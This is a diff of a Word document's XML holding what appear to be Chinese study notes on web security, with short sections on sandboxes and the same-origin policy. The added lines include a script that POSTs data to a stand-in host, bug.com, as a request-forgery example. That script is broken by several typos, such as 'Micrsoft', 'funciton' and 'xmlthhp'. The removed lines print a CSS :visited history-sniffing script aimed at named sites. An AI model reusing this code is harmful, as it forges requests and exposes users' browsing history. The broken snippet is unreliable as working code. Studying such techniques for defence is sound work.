+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>var xmlhttp=new ActiveXobject(“Micrsoft.XMLHTTP”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>xmlhttp.open(“POST”,’http://www.bug.com/file.ext’,true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>xmlhttp.onreadystatechange=funciton(){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>if(xmlthhp.readystatus==4&amp;&amp;xmlhttp.status==200)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>alert(xmlhttp.responseText);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>xmlhttp.send(post_data);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>八．sandbox(沙箱)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>sandbox的作用是防止恶意软件在用户的计算机上安装木马和病毒，并严格限制客户机的访问，例如google的浏览器chrome就使用了沙箱技术，以隔离JavaScript的执行，html的解析，以及恶意插件的运行</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>同源安全策略：防止JavaScript跨域访问其他对象，同域指：同协议，同域名，同端口，而iframe却能跨域</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="21"/>
@@ -3594,648 +5315,6 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>&lt;ul id=”visited”&gt;&lt;/ul&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>&lt;ul id=”notVisited”&gt;&lt;/ul&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>&lt;script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>var website={</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>“www.qq.com”,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>“www.baidu.com”,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>“www.163.com”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>};</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>for(var i=0;i&lt;website.length;i++){</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>var link=document.createElement(“a”);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>link.id=”id”+i;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>link.href=website[i];</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>link.innerHTML=website[i];</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>document.write(“&lt;style&gt;”);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>document.write(“#id”+i+”:visited{color:#FF0000}”);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>document.write(”&lt;/style&gt;”);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>document.body.appendChild(link);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>var color=document.defaultView.getComputedStyle(link,null).getPropertyValue(“color”);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>document.body.removeChild(link);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>var item=document.createElement(“li”);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>item.appendChild(link);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>if(color==”rgb(255,0,0)”){</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="840" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>document.getElementById(‘visited’).appendChild(item);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>}else{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="840" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>document.getElementById(‘notVisited’).appendChild(item);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>&lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
@@ -4257,7 +5336,480 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>七</w:t>
+        <w:t>九</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>常见的编码方法</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
